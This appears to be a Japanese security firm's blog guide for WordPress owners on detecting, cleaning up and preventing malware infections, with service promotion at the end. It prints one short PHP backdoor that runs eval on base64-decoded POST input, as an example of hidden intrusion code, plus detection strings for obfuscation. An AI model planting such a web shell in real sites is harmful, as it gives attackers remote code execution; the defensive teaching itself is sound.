X(旧Twitter) 
Facebook 
LINE 
WordPressがマルウェアに感染?10分でできる確認と今すぐできる対策
「サイトの表示が、やけに遅い気がする」
「記事の中に、貼った覚えのないリンクがある」
「Google検索の結果に、不穏な警告が出ている」
こうした症状が出たとき、「もしかしてウイルス?」と不安になりますよね。
WordPressは世界中で使われているCMSですが、それゆえに攻撃者の標的にもなりやすく、放っておくと、あっという間に感染してしまいます。
この記事では、ウイルス感染の確認から駆除、予防まで、15年以上の脆弱性診断実績を持つIFTの知見をもとに、初めての方でも迷わずできる手順を解説します。
この記事でわかること
- 自分のサイトが感染しているか今すぐ確認する方法
- 感染が疑われる場合の緊急対処手順
- 今後感染しないための予防策
- 自力対処の限界と専門家に依頼すべき判断基準
この記事を書いた人
みらいと
セキュリティサービス事業部 コンサルタント/プログラマーからシステム運用を経て情報セキュリティ全般の業務に従事。現在は培った情報セキュリティの経験を活かしお客様の課題に向き合った企画やマーケティングを担当。
目次
WordPressがウイルスに感染する3つの経路
WordPressがウイルス被害に遭う原因。 実はそのほとんどが、高度なハッキング技術によるものではなく、「基本的な管理の隙」を突かれたものだということをご存知でしょうか。
攻撃者がどこから侵入してくるのか。
主なルートは3つです。
1. 古いプラグインの脆弱性を狙った攻撃
プラグインやテーマ(デザイン機能)にセキュリティ上の欠陥(脆弱性)が見つかると、攻撃者は世界中のWordPressサイトを一斉にスキャンします。
恐ろしいのは、そのスピード感です。
欠陥が見つかってから攻撃が始まるまでは非常に速く、公開当日から攻撃が始まることさえあります。
セキュリティ企業のPatchstackが発表した2023年の統計によると、WordPressの新たな欠陥の97%がプラグインに起因していました。
出典:State of WordPress Security In 2024(Patchstack)
別の分析では、ハッキング被害を受けたサイトの74%に更新されていないプラグインが存在していたとされています。
つまり、プラグインを更新しないことが、最大の危険要因になっているのです。
実際、私たちIFTに寄せられる相談でも、古いバージョンのプラグインを使い続けていたことでランサムウェアなどの実害に遭ったケースが多いです。
2. 管理画面への「総当たり攻撃(ブルートフォース)」
管理画面への不正ログインも主な感染経路です。
その規模は凄まじく、Wordfence社の2023年の報告によれば、1日に6,500万件もの不正ログイン試行をブロックしたといいます。
出典:The Wordfence 2024 State of WordPress Security Report(Wordfence)
攻撃者は自動ツールを使って、WordPressのログインページに対し、24時間365日パスワードを試し続けます。
典型的な手口は2つあります。
- 辞書攻撃: 「password123」「admin」など、ありがちな単語を片っ端から試す。
- リスト型攻撃: 過去にどこかで流出したIDとパスワードのリストを使って侵入を試みる。
ユーザー名を初期設定の「admin」のままにしていたり、使い回しの短いパスワードを使っていたりすれば、突破されるのは時間の問題です。
一度入られてしまえば、攻撃者は裏口(バックドア)を作り、あなたのサイトを自由に操れるようになってしまいます。
3. 海賊版テーマ・プラグインの罠
「有料のテーマが無料で手に入る」
そんな甘い言葉で配布されている海賊版ファイルには、高確率でウイルスが仕込まれています。
これらは攻撃者が仕掛けた「トロイの木馬」です。
一見、便利なプラグインとして機能しているように見えても、裏ではスパムメールを大量送信したり、サイトの管理者権限を乗っ取ったりするプログラムが動いています。
Sucuri社の調査では、感染サイトの約半数(49.21%)から侵入用のファイルが見つかっています。
出典:2023 Hacked Website & Malware Threat Report(Sucuri)
攻撃者が将来また侵入するための抜け穴として、ファイルを残しているのです。
実際の侵入コードの例
少し専門的になりますが、仕込まれるプログラムの一例です。
<?php $hello = ‘eval’; $world = ‘base64_decode’;
$hello($world($_POST[‘payload’])); ?>
一見何をしているか分からないように書かれていますが、これは「外部から送られてきた命令を、無条件で何でも実行する」という極めて危険なコードです。
これがテーマの奥深くに潜んでいたら、管理者が気づくのは困難でしょう。
自分のサイトが感染しているか10分で確認する4つの方法
原因がわかったところで、あなたのサイトが無事かどうかを確認しましょう。
専門的な知識がなくてもできる方法を厳選しました。
かかる時間は、10分程度。一つずつ確認していきましょう。
① Google検索とブラウザで「危険なサイト」警告が出ていないか
もっとも分かりやすいサインは、Googleやブラウザからの警告です。
Chromeなどで自分のサイトを開こうとしたとき、赤い画面で「このサイトは安全ではありません」と表示されませんか?
これはGoogleが「このサイトは危険だ」と判断し、訪問者をブロックしてくれている状態です。
また、Googleで自分のサイト名(社名やブログ名)を検索してみてください。 検索結果の下に「このサイトはハッキングされている可能性があります」という不穏なメッセージが出ていないでしょうか。
Google Search Console(サイトの管理ツール)で「セキュリティ上の問題が検出されました」といった通知を受け取る場合もあります。
もしこれらが出ていたら、感染の可能性は極めて高い状態です。訪問者を守るためにも、サイトの一時非公開(メンテナンスモード)を検討すべき段階です。
② 不審な表示・広告・ページの遅さをチェック
実際にサイトを開いて、隅々まで見てみましょう。
ウイルスは、目立たないように隠れていることもあれば、大胆に動き回ることもあります。
| チェック項目 | 具体的な症状の例 |
|---|---|
| 勝手なリダイレクト | サイトを開いた瞬間、当選詐欺や海外の通販サイトへ勝手に飛ばされる。(特にスマホでのアクセス時のみ発生するケースも多いです) |
| 見覚えのない広告 | 記事の中やフッター(ページ最下部)に、英語の怪しいリンクや医薬品の広告が紛れ込んでいないか。 |
| 異常な遅さ | 昨日まではサクサク動いていたのに、急にページが開かなくなった。裏でウイルスがスパムメールを大量送信し、サーバーが悲鳴を上げている可能性があります。 |
| ログイン不可 | 正しいパスワードを入れているはずなのにログインできない。管理者が乗っ取られ、パスワードを変えられた可能性があります。 |
特に「別サイトへ飛ばされる」「勝手に広告が出る」は、感染の典型的なサインです。
不審な動作を1つでも確認した場合、念のため次の管理画面での確認も行いましょう。
③ 管理画面に見覚えのないプラグインやユーザーが追加されていないか
管理画面に入れる場合は、以下の2箇所を確認してください。
- プラグイン一覧:
自分で入れた覚えのないプラグインはありませんか?
「WP Security」「SEO Helper」など、それっぽい名前で偽装しているケース(例:json-task-basicなど)がよくあります。不審なものは即座に無効化・削除です。 - ユーザー一覧:
あなた(管理者)以外に、見知らぬ管理者は増えていませんか?
wpengineer admin2 backup_user といった名前で、勝手に管理者権限を持つユーザーが作られていることがあります。見つけ次第、削除してください。
注意点として、高度なウイルスの中には、プラグイン一覧から自らの存在を隠すものもあります。
プラグイン一覧に不審なものが無くても安心はできませんが、少なくとも見覚えのないプラグインがある場合は感染が強く疑われます。
④ FTPでサーバーのファイルを直接調べる(※中級者向け)
少しハードルが上がりますが、サーバー上のファイルを直接見るのが確実です。
FTPソフトやサーバーのファイルマネージャーを使い、以下の異常がないか探します。
- 画像の場所にプログラムがある:
wp-content/uploads フォルダは本来、画像などのメディアファイル置き場です。ここに .php という拡張子のファイルがあれば、ほぼ黒(バックドア)です。 - 紛らわしいファイル名:
wp-config.php に似せた wp-conf1g.php や、wp-update.php など、ありそうで無いファイル名が混ざっていませんか? - 怪しいコードの痕跡:
ファイルの中にeval base64_decode gzinflateといった文字列が多用されていないか。これらはウイルスが自分の正体を隠す(難読化する)ためによく使う命令です。
注意
知識なくファイルを削除すると、サイトが完全に壊れてしまうリスクがあります。
怪しいファイルを見つけても、まずは「ファイル名を変える(例:.php → .php.suspect)」程度に留め、バックアップを取ってから慎重に扱ってください。
以上が確認方法ですが、兆候が見当たらなくても違和感がある場合、念のため専門家に診断を依頼することを検討してください。
感染が疑われる場合にすぐやるべき4つの緊急対処
「感染しているかもしれない」と確信したとしても、慌てないでください。
手順を間違えなければ、復旧できる可能性は十分にあります。
以下の手順を、順番通りに進めていきましょう。
①何はともあれ、サイト全体とデータベースをバックアップ
「ウイルス入りのデータをバックアップして意味があるの?」と思うかもしれません。 しかし、これが最優先です。
復旧作業中に誤って必要なファイルを消してしまい、取り返しがつかなくなるケースがあまりに多いからです。
また、後で専門家に依頼する場合、感染状態のデータが原因特定の手がかりになります。
- プラグインで:
UpdraftPlus などが入っていれば、そこからバックアップ。 - サーバー管理画面で:
エックスサーバーやConoHaなど、多くのサーバーには「バックアップ機能」があります。これを使うのが一番安全で確実です。
バックアップデータは、必ず自分のPCなどの「手元」に保存しておきましょう。
②すべてのパスワードを12桁以上の強固なものに変更
バックアップが終わったら、直ちにパスワードを変更して、攻撃者を締め出します。
- WordPressのパスワード:
推測されにくい「英数記号混じり・12桁以上」に変更します。
不審なユーザーがいたら、この時点で削除します。 - サーバー(FTP・DB)のパスワード:
レンタルサーバーの管理画面のログインパスワード、FTPパスワードも変更します。
これで、攻撃者が盗んだパスワードは使えなくなります。
③WP本体・プラグイン・テーマを最新版に更新し、不審なものを削除
不審なプラグインを削除
WordPress管理画面の「プラグイン」→「インストール済みプラグイン」を開き、自分でインストールした覚えのないプラグインがないか確認します。
見覚えのないプラグインがあれば、「削除」をクリックして削除してください。
WordPress・プラグイン・テーマを最新版に更新
管理画面の「ダッシュボード」→「更新」から、WordPress本体、すべてのプラグイン、テーマを最新版に更新してください。
古いバージョンに残っている欠陥(セキュリティホール)を塞ぐことができます。
注意
ここまでやっても症状が治まらない場合、ウイルスがもっと深い場所(データベースやコアファイル)に埋め込まれている可能性があります。
この場合、ファイルを直接操作する専門的な作業が必要になるため、この段階で専門家への相談を検討してください。
④サイトの動作確認とGoogle Search Consoleで再審査リクエスト
サイトが正常に戻ったことを確認できたら、最後にGoogleへ報告します。
これをしないと、検索結果の「危険なサイト」という警告が消えません。
Google Search Consoleを開き、「セキュリティと手動による対策」メニューから「審査をリクエスト」ボタンを押します。
審査には数日~1週間程度かかり、Google側で安全が確認されれば警告が解除されます。
二度と感染しないための4つの基本予防策
復旧したとはいえ、感染前と同じ状態(欠陥が放置された状態)のままではまたすぐに狙われる可能性があります。
感染を経験した方も、まだ被害がない方も、今後ウイルスに感染しないための基本的な予防策を4つだけ紹介します。
① アップデートは「数日以内」が鉄則
もっとも地味で、もっとも効果的なのがこれです。
ハッキング被害の74%はプラグイン更新の放置が原因でしたね。
WordPress管理画面の「ダッシュボード」→「更新」を開くと、WordPress本体、プラグイン、テーマの更新が必要かどうかが表示されます。
更新通知が出たら、できるだけ早く「今すぐ更新」ボタンをクリックして適用してください。
数ヶ月放置は論外です。数週間以内、可能なら数日以内のアップデートが理想です。
② HTTPS化で通信を暗号化
URLが http:// ではなく https:// になっていますか?
まだなら、今すぐサーバーの管理画面からSSL設定をONにしましょう。
多くのレンタルサーバー(エックスサーバー、ロリポップなど)では、管理画面から無料でSSL証明書を設定できる機能が用意されています。
通信を暗号化し、パスワードの盗聴を防ぐための基本中の基本です。
③ セキュリティプラグインとWAFで攻撃を自動ブロック
24時間サイトを見張ってくれるセキュリティプラグインを導入しましょう。
- Wordfence Security: ウイルススキャン機能と不正アクセスをブロック。
- Sucuri Security: ファイルの改ざん監視や遠隔スキャンに特化。
どちらか一つでも入れておけば、攻撃の多くを自動で防いでくれます。
あわせて読みたい
WordPressのセキュリティ対策プラグインの選び方とプロ推奨の5選を紹介
WordPressのセキュリティ対策プラグインは、WAFやログイン保護、改ざん検知など、守れる範囲が製品ごとに違います。 目的を決めずに導入すると、必要な機能が抜けたまま「対策したつもり」になりやすいのです。 プラグインは「攻撃を止める」ためのもの、診断ツールは「弱点を見つける」ためのものです。
注意点として、セキュリティプラグインはあくまで「補助」です。
導入したからといって油断せず、基本のアップデートやパスワード対策を怠らないようにしてください。
④ 週1回以上の自動バックアップをクラウドに保存
万が一、また感染してしまっても、バックアップさえあれば被害を最小限に留められます。
重要なのは、サーバーとは別の場所(クラウド)に保存することです。
UpdraftPlus や BackWPup などのプラグインを使えば、Google DriveやDropboxへ自動でバックアップを送れます。
| プラグイン名 | 特徴 |
|---|---|
| UpdraftPlus(無料版あり) | 世界で導入数No.1とも言われるバックアッププラグイン。ファイルとデータベースをまとめてクラウド保存でき、復元もボタン一つで簡単。 |
| BackWPup(無料版あり) | データベースも含めたサイト全体を定期的にバックアップし、DropboxやGoogle Driveなどクラウドに保存できる。 |
バックアップは、最低でも週1回以上。更新が頻繁なサイトなら毎日の自動バックアップが望ましいです。
「予防策は分かったけど、自分の設定は本当に大丈夫?」
そんな不安を感じたら、一度プロの目でチェックしてもらうのも一つの方法です。
WordPress管理画面レビュー
WordPress管理画面レビュー | セキュリティのプロが設定を診断します!
WordPress管理画面レビューなら株式会社アイ・エフ・ティ(本社:東京都)にお任せください!専門家が管理画面を目視で診断し、プラグインや権限設定の不備を検出・可視化します。専門知識がなくても、具体的なレポートでサイトのセキュリティを強化できます。
自力で直せないときは、無理せず専門家へ依頼
ここまで、自分でできる対処法をお伝えしてきました。
しかし、相手は悪意を持ったプロの攻撃者です。
初心者の手には負えないケースも多々あります。
無理だと思ったら早めに専門家の力を借りることも大切です。
専門家へ依頼すべきケース
- 3日頑張っても直らない(これ以上は時間の浪費です)
- 消しても消してもウイルスが復活する(バックドアが残っています)
- 会社やお店のサイトで、1日でも止まると損害が出る
- データベースやコードを触るのが怖い
「自分でなんとかしなきゃ」と抱え込み、時間が経つほど被害は拡大し、Googleからの評価も下がり続けてしまいます。
餅は餅屋。専門家に任せれば、原因の特定からウイルスの完全駆除、そして再発防止までを最短ルートで解決できます。
私たちIFTは、15年以上・1,000件以上の診断実績を持つセキュリティの専門家集団です。
「どうにもならない」「不安で仕方がない」。そんな時は、一人で悩まず私たちに声をかけてください。
あなたのサイトを、一番安全な方法で取り戻すお手伝いをします。
まとめ:WordPressをウイルスから守るのは、あなたの「習慣」
WordPressのセキュリティ対策に、魔法のような裏技はありませんが、基本対策を徹底すれば防げます。
この記事のポイント
- 通知が来たらすぐにアップデートする
- 12桁以上の複雑なパスワードを設定し使い回さない
- 公式以外のテーマ/プラグインは導入しない
- 週1回以上の自動バックアップをクラウドに保存する
この当たり前の習慣の積み重ねだけが、あなたのサイトを守ります。
今日からできることを、まずは一つずつ実践していきましょう。
それが、ウイルスという見えない敵に対する最強の防御壁になるはずです。
自力での対処に不安がある場合は、IFTにご相談ください。
15年以上・1,000件超の診断実績で、WordPressのセキュリティ診断から復旧支援まで対応しています。
